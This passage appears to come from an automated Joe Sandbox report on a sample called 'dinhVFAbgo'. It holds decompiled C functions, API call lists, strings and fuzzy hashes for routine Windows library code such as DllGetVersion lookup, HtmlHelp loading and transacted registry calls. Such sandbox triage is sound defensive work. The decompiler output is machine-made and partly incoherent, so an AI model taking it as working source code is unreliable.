				_t12 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t12 ^ _t39;
				_t14 = _a8;
				_t26 = _a4;
				_push(L"comctl32.dll");
				_v32 = _t14;
				 *_t26 =  *_t26 & 0x00000000;
				 *_t14 =  *_t14 & 0x00000000;
				_t38 = E00CB73F8(_t26, __ecx, __edi, _t37, __eflags);
				if(_t38 != 0) {
					_push(__edi);
					_t35 = GetProcAddress(_t38, "DllGetVersion");
					__eflags = _t35;
					if(_t35 == 0) {
						_t36 = 0x80004001;
					} else {
						E00DDFBE0(_t35,  &_v28, 0, 0x14);
						_v28 = 0x14;
						 *0xe17a64( &_v28);
						_t36 =  *_t35();
						__eflags = _t36;
						if(_t36 >= 0) {
							 *_t26 = _v24;
							 *_v32 = _v20;
						}
					}
					FreeLibrary(_t38);
					_t18 = _t36;
					_pop(_t34);
				} else {
					_t18 = E00CABB63();
				}
				return E00DDCBCE(_t18, _t26, _v8 ^ _t39, _t33, _t34, _t38);
			}

0x00cb84a7
0x00cb84a7
0x00cb84ad
0x00cb84b4
0x00cb84b7
0x00cb84bb
0x00cb84bf
0x00cb84c4
0x00cb84c7
0x00cb84ca
0x00cb84d2
0x00cb84d6
0x00cb84df
0x00cb84ec
0x00cb84ee
0x00cb84f0
0x00cb852c
0x00cb84f2
0x00cb84fa
0x00cb8502
0x00cb850f
0x00cb8517
0x00cb8519
0x00cb851b
0x00cb8523
0x00cb8528
0x00cb8528
0x00cb851b
0x00cb8532
0x00cb8538
0x00cb853a
0x00cb84d8
0x00cb84d8
0x00cb84d8
0x00cb8548

APIs

Part of subcall function 00CB73F8: LoadLibraryW.KERNEL32(?,00E57378,00000010,00CB84D2,comctl32.dll,00CB050B), ref: 00CB7432

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00CB84E6
FreeLibrary.KERNEL32(00000000), ref: 00CB8532

Part of subcall function 00CABB63: GetLastError.KERNEL32 ref: 00CABB63

Strings

DllGetVersion, xrefs: 00CB84E0
comctl32.dll, xrefs: 00CB84BF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: DllGetVersion$comctl32.dll
API String ID: 2540614322-3857068685
Opcode ID: 47431acb24861b860f426fedbfd82d09fd34b0f335b528967e302710649347c9
Instruction ID: 2db8e93e683fc1d6874bbe486fadd6f1b87276d650cc0a3941c2a7b94d337446
Opcode Fuzzy Hash: 47431acb24861b860f426fedbfd82d09fd34b0f335b528967e302710649347c9
Instruction Fuzzy Hash: 9E11BF76A0030A9BCB119FA9D855ADFBBB9EF84750F010065EA11B7391DF34DA08CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0AD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CC0AD8(void* __ebx, signed int __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				void _v24;
				void* __edi;
				void* __ebp;
				signed int _t7;
				signed int _t13;
				char _t15;
				void* _t22;
				void* _t27;
				signed int _t28;
				int _t29;
				void* _t31;
				signed int _t32;
				char _t39;

				_t30 = __esi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t7 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t7 ^ _t32;
				_t29 = 8;
				E00CB7DC9(__ecx, _t29, __esi, _t29);
				if( *0xe87074 == 0) {
					_t28 = 0;
					do {
						_t23 = _t28 & 0x00000001;
						 *(_t32 + _t28 * 2 - 0x14) = 0x5555 << (_t28 & 0x00000001);
						_t28 = _t28 + 1;
					} while (_t28 < _t29);
					_push(__esi);
					_t31 = CreateBitmap(_t29, _t29, 1, 1,  &_v24);
					if(_t31 != 0) {
						 *0xe87074 = CreatePatternBrush(_t31);
						DeleteObject(_t31);
					}
					_pop(_t30);
				}
				_t38 =  *0xe87078;
				if( *0xe87078 == 0) {
					_t13 = E00DDCEDD(_t23, _t38, E00CC06DD);
					_pop(_t23);
					asm("sbb al, al");
					_t15 =  ~_t13 + 1;
					_t39 = _t15;
					 *0xe87078 = _t15;
				}
				E00CB7E3D(_t23, _t29);
				return E00DDCBCE(E00CB9E25(_t22, _t23, _t27, _t29, _t30, _t39,  *0xe87074), _t22, _v8 ^ _t32, _t27, _t29, _t30);
			}

0x00cc0ad8
0x00cc0ad8
0x00cc0ad8
0x00cc0ade
0x00cc0ae5
0x00cc0aeb
0x00cc0aed
0x00cc0af9
0x00cc0afb
0x00cc0afd
0x00cc0b04
0x00cc0b0a
0x00cc0b0f
0x00cc0b10
0x00cc0b14
0x00cc0b25
0x00cc0b29
0x00cc0b33
0x00cc0b38
0x00cc0b38
0x00cc0b3e
0x00cc0b3e
0x00cc0b3f
0x00cc0b46
0x00cc0b4d
0x00cc0b54
0x00cc0b55
0x00cc0b57
0x00cc0b57
0x00cc0b59
0x00cc0b59
0x00cc0b5f
0x00cc0b7b

APIs

Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00E86E80,00000001,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7), ref: 00CB7DFA
Part of subcall function 00CB7DC9: InitializeCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E10
Part of subcall function 00CB7DC9: LeaveCriticalSection.KERNEL32(00E86E80,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E1E
Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E2B

CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00000000), ref: 00CC0B1F
CreatePatternBrush.GDI32(00000000), ref: 00CC0B2C
DeleteObject.GDI32(00000000), ref: 00CC0B38

Strings

htp, xrefs: 00CC0B48

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
String ID: htp
API String ID: 3767330792-1178280156
Opcode ID: c9b90e56f5c39521fbe0701c49d110062885976bd7e257c90c39c765afb6a884
Instruction ID: c30e128d6391f3275eed6580da1e023ee4214cb77dc48c4d6710edf4d9eac2b9
Opcode Fuzzy Hash: c9b90e56f5c39521fbe0701c49d110062885976bd7e257c90c39c765afb6a884
Instruction Fuzzy Hash: EC010831A05644AFD711EB75ED45FFE3769DBC1B00F2001ADF942621D0DE618A49D771

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1112 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CB1112(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				struct _WNDCLASSA _v60;
				_Unknown_base(*)()* _t30;
				void* _t33;
				void* _t35;
				void* _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				void* _t47;
				intOrPtr _t56;
				CHAR* _t57;
				void* _t59;
				signed int _t60;
				void* _t67;

				_t67 = __eflags;
				_t46 = __ebx;
				_push(__esi);
				E00CB7DC9(__ecx, __edi, __esi, 0xc);
				_push(0xcb22cc);
				_t59 = E00CADAB2(__ebx, 0xe68200, __edi, __esi, _t67);
				if(_t59 == 0) {
					E00CAA4E7(__ebx, 0xe68200, __edi, _t59, __eflags);
					asm("int3");
					_push(0x30);
					E00DDD595(0xe08775, __ebx, __edi, _t59);
					_t56 = _a4;
					__eflags = GetClassInfoA( *(_t56 + 0x10),  *(_t56 + 0x24),  &_v60);
					if(__eflags != 0) {
						L16:
						_t30 = 1;
						__eflags = 1;
					} else {
						_push(_t56);
						__eflags = E00CB749F(__ebx, 0xe68200, _t56, _t59, __eflags);
						if(__eflags != 0) {
							_t33 = E00CACEEE(__ebx, _t56, _t59, __eflags);
							__eflags =  *((char*)(_t33 + 0x14));
							if( *((char*)(_t33 + 0x14)) != 0) {
								E00CB7DC9(0xe68200, _t56, _t59, 1);
								_t60 = 0;
								_v8 = 0;
								_t35 = E00CACEEE(_t46, _t56, 0, __eflags);
								_t57 =  *(_t56 + 0x24);
								_t19 = _t35 + 0x34; // 0x34
								_t47 = _t19;
								__eflags = _t57;
								if(_t57 != 0) {
									_t60 = E00DEC1A0(_t57);
								}
								_push(_t60);
								E00CA93E8(_t47, _t47, _t57, _t57);
								E00CA9B75(_t47, 0xa);
								_t20 =  &_v8;
								 *_t20 = _v8 | 0xffffffff;
								__eflags =  *_t20;
								E00CB7E3D(_t47, 1);
							}
							goto L16;
						} else {
							_t30 = 0;
						}
					}
					return E00DDD4FA(_t30);
				} else {
					if( *(_t59 + 8) != 0) {
						L6:
						E00CB7E3D(0xe68200, 0xc);
						 *0xe17a64(_a4, _a8, _a12, _a16);
						_t42 =  *( *(_t59 + 8))();
					} else {
						_t43 = E00CB1C03(__ebx, 0xe68200, __edx, L"hhctrl.ocx");
						 *(_t59 + 4) = _t43;
						_pop(0xe68200);
						if(_t43 != 0) {
							_t44 = GetProcAddress(_t43, "HtmlHelpA");
							 *(_t59 + 8) = _t44;
							__eflags = _t44;
							if(_t44 != 0) {
								goto L6;
							} else {
								FreeLibrary( *(_t59 + 4));
								 *(_t59 + 4) =  *(_t59 + 4) & 0x00000000;
								goto L3;
							}
						} else {
							L3:
							_t42 = 0;
						}
					}
					return _t42;
				}
			}

0x00cb1112
0x00cb1112
0x00cb1115
0x00cb1118
0x00cb111d
0x00cb112c
0x00cb1130
0x00cb1195
0x00cb119a
0x00cb119b
0x00cb11a2
0x00cb11a7
0x00cb11ba
0x00cb11bc
0x00cb1219
0x00cb121b
0x00cb121b
0x00cb11be
0x00cb11be
0x00cb11c4
0x00cb11c7
0x00cb11cd
0x00cb11d2
0x00cb11d6
0x00cb11da
0x00cb11df
0x00cb11e1
0x00cb11e4
0x00cb11e9
0x00cb11ec
0x00cb11ec
0x00cb11ef
0x00cb11f1
0x00cb11fa
0x00cb11fa
0x00cb11fc
0x00cb1200
0x00cb1209
0x00cb120e
0x00cb120e
0x00cb120e
0x00cb1214
0x00cb1214
0x00000000
0x00cb11c9
0x00cb11c9
0x00cb11c9
0x00cb11c7
0x00cb1221
0x00cb1132
0x00cb1136
0x00cb1170
0x00cb1172
0x00cb1188
0x00cb118e
0x00cb1138
0x00cb113d
0x00cb1142
0x00cb1145
0x00cb1148
0x00cb1154
0x00cb115a
0x00cb115d
0x00cb115f
0x00000000
0x00cb1161
0x00cb1164
0x00cb116a
0x00000000
0x00cb116a
0x00cb114a
0x00cb114a
0x00cb114a
0x00cb114a
0x00cb1148
0x00cb1192
0x00cb1192

APIs

Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00E86E80,00000001,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7), ref: 00CB7DFA
Part of subcall function 00CB7DC9: InitializeCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E10
Part of subcall function 00CB7DC9: LeaveCriticalSection.KERNEL32(00E86E80,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E1E
Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E2B

Part of subcall function 00CADAB2: __EH_prolog3_catch.LIBCMT ref: 00CADAB9

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00CB1154
FreeLibrary.KERNEL32(?,?,Function_0000A535), ref: 00CB1164

Strings

HtmlHelpA, xrefs: 00CB114E
hhctrl.ocx, xrefs: 00CB1138

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$AddressEnterProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLibraryModulePointer
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 849444252-63838506
Opcode ID: a00d8d1cba0a9128b4d1bab4260ddcb57475264ef102e12e502b12eba6dbcb76
Instruction ID: acc22a16ef8a2f9ad58e9f69b636bd49bfd2e45ced0cc07a4716ef6bfc124e44
Opcode Fuzzy Hash: a00d8d1cba0a9128b4d1bab4260ddcb57475264ef102e12e502b12eba6dbcb76
Instruction Fuzzy Hash: 67017B30104706AFCB216FB6DC16BDF3BA8EF00BA0F008425FD67A2660CB30D940AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD110 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,?,00CAD0C7,?,?,00000000,?,?,?,?,?,?,8D2643C2), ref: 00CAD121
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00CAD131

Strings

Advapi32.dll, xrefs: 00CAD11C
RegCreateKeyTransactedA, xrefs: 00CAD12B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedA
API String ID: 1646373207-1184998024
Opcode ID: 923bbc9154ef5e0f7ec7c5daffdf0b8f20ab301f67cf80d65ff796da54bb19f9
Instruction ID: 0b97c368c1422777e9a54cb9158c1019060a3e9113d54a88f8eb9ea6f1e1b3b3
Opcode Fuzzy Hash: 923bbc9154ef5e0f7ec7c5daffdf0b8f20ab301f67cf80d65ff796da54bb19f9
Instruction Fuzzy Hash: B4016236144206EFCF121F95DC04BEE3BB6EB49B65F044025F666A1570C772C961EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,?,00000000,?,?,00CB80D4,?,?,8D2643C2,?,00000000,00000000,Function_00167AA4,000000FF,?,00CACDAC), ref: 00CAD193
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00CAD1A3

Strings

Advapi32.dll, xrefs: 00CAD18E
RegDeleteKeyTransactedA, xrefs: 00CAD19D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA
API String ID: 1646373207-1972538232
Opcode ID: d1afb9205ec3a32f1e4b5f21ef6f599faac8a0df40a65bc75bdee6c7b7725059
Instruction ID: 278614f5ee4b4ef354ac5a4a41d867e18b491625ac9c3bcacce93bbeb1e7b24c
Opcode Fuzzy Hash: d1afb9205ec3a32f1e4b5f21ef6f599faac8a0df40a65bc75bdee6c7b7725059
Instruction Fuzzy Hash: 25F0BB73244306AFAB111F55AC848AE777DEB85BBD314403AF6A391510DA318D44D760

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8636 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00CB8636(struct HWND__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t7;
				void* _t9;
				int _t16;
				void* _t19;
				void* _t22;
				void* _t23;
				struct HWND__* _t24;
				signed int _t25;

				_t7 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t7 ^ _t25;
				_t24 = _a4;
				if(_t24 == 0 || (GetWindowLongA(_t24, 0xfffffff0) & 0x0000000f) != _a8) {
					_t9 = 0;
				} else {
					GetClassNameA(_t24,  &_v20, 0xa);
					_t16 = CompareStringA(0x7f, 1,  &_v20, 0xffffffff, "combobox", 0xffffffff);
					asm("sbb eax, eax");
					_t9 =  ~(_t16 - 2) + 1;
				}
				return E00DDCBCE(_t9, _t19, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00cb863c
0x00cb8643
0x00cb8647
0x00cb864c
0x00cb868d
0x00cb865f
0x00cb8666
0x00cb867d
0x00cb8688
0x00cb868a
0x00cb868a
0x00cb869b

APIs

GetWindowLongA.USER32 ref: 00CB8651
GetClassNameA.USER32(?,?,0000000A), ref: 00CB8666
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00CB867D

Strings

combobox, xrefs: 00CB866E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: 298f2c130bca7aa2e141440bd86cf0d3662f7349887c05b2e721841a19f275d0
Instruction ID: 89085b7895bb38ae19ec7892ff9eb53d4c22989167a34022bf52f49b2d12c3d6
Opcode Fuzzy Hash: 298f2c130bca7aa2e141440bd86cf0d3662f7349887c05b2e721841a19f275d0
Instruction Fuzzy Hash: 9FF08131658129AECB00EF698C05EFE73B8EB05721F544716F435E61C0DA60AA08C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD1DF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CAD1F0
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00CAD200

Strings

Advapi32.dll, xrefs: 00CAD1EB
RegOpenKeyTransactedA, xrefs: 00CAD1FA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedA
API String ID: 1646373207-496252237
Opcode ID: 716cab9aee802b84433d1d6e680a0b16effa51c691bb6293dffefd24ec8c3a99
Instruction ID: 53bdafe5773e8fb996b318aff8d304295e8b960131fe905ac6e6fcef55f8dee9
Opcode Fuzzy Hash: 716cab9aee802b84433d1d6e680a0b16effa51c691bb6293dffefd24ec8c3a99
Instruction Fuzzy Hash: 6AF06232244206EFCB161F55EC08BEA3B66FB89B5AF048535F563A1560DA71CA60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF110 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00CAF127
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 00CAF137

Strings

kernel32.dll, xrefs: 00CAF122
GetFileAttributesTransactedA, xrefs: 00CAF131

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedA$kernel32.dll
API String ID: 1646373207-3426858862
Opcode ID: 3e0693bd987b2697cc222a620b1c53df57247d368b59d518f25ab7c1fb5573f4
Instruction ID: 6301ff43504c735910bff6cc1d2849a53fe03d30ca41f9a8a6013e99bbb1fb5a
Opcode Fuzzy Hash: 3e0693bd987b2697cc222a620b1c53df57247d368b59d518f25ab7c1fb5573f4
Instruction Fuzzy Hash: 5EF0F032244306EFEB201FE0EC48BEF77A8EB04B1AF00443DFA60A1160DB718D91D690

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3273 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00CA3273(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				char _v4;
				intOrPtr _v16;
				char _v24;
				signed int _t44;
				void* _t48;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t83;

				_t60 = __ecx;
				_push(4);
				E00DDD52C(0xe07a87, __ebx, __edi, __esi);
				_t77 = __ecx;
				_v16 = __ecx;
				E00DDE064(__ecx, 0);
				_v4 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_v4 = 6;
				if(_a8 == 0) {
					E00DDE017("bad locale name");
					asm("int3");
					_push(0xffffffff);
					_push(E00E07AA4);
					_push( *[fs:0x0]);
					_push(_t77);
					_push(__edi);
					_t44 =  *0xe68dd4; // 0x8d2643c2
					_push(_t44 ^ _t83);
					 *[fs:0x0] =  &_v24;
					_t78 = _t60;
					E00DDE392(_t60, _t78);
					if( *((intOrPtr*)(_t78 + 0x2c)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 0x2c)));
					}
					 *((intOrPtr*)(_t78 + 0x2c)) = 0;
					if( *((intOrPtr*)(_t78 + 0x24)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 0x24)));
					}
					 *((intOrPtr*)(_t78 + 0x24)) = 0;
					if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 0x1c)));
					}
					 *((intOrPtr*)(_t78 + 0x1c)) = 0;
					if( *((intOrPtr*)(_t78 + 0x14)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 0x14)));
					}
					 *((intOrPtr*)(_t78 + 0x14)) = 0;
					if( *((intOrPtr*)(_t78 + 0xc)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 0xc)));
					}
					 *((intOrPtr*)(_t78 + 0xc)) = 0;
					if( *((intOrPtr*)(_t78 + 4)) != 0) {
						E00DE2153( *((intOrPtr*)(_t78 + 4)));
					}
					 *((intOrPtr*)(_t78 + 4)) = 0;
					_t48 = E00DDE0BC(_t78);
					 *[fs:0x0] = _v16;
					return _t48;
				} else {
					E00DDE347(__ecx, __ecx, _a8);
					return E00DDD4FA(_t77);
				}
			}

0x00ca3273
0x00ca3273
0x00ca327a
0x00ca327f
0x00ca3281
0x00ca3287
0x00ca328c
0x00ca328f
0x00ca3292
0x00ca3295
0x00ca3298
0x00ca329d
0x00ca32a0
0x00ca32a4
0x00ca32a7
0x00ca32ab
0x00ca32ae
0x00ca32b1
0x00ca32b4
0x00ca32b7
0x00ca32be
0x00ca32da
0x00ca32df
0x00ca32e3
0x00ca32e5
0x00ca32f0
0x00ca32f1
0x00ca32f2
0x00ca32f3
0x00ca32fa
0x00ca32fe
0x00ca3304
0x00ca3307
0x00ca3311
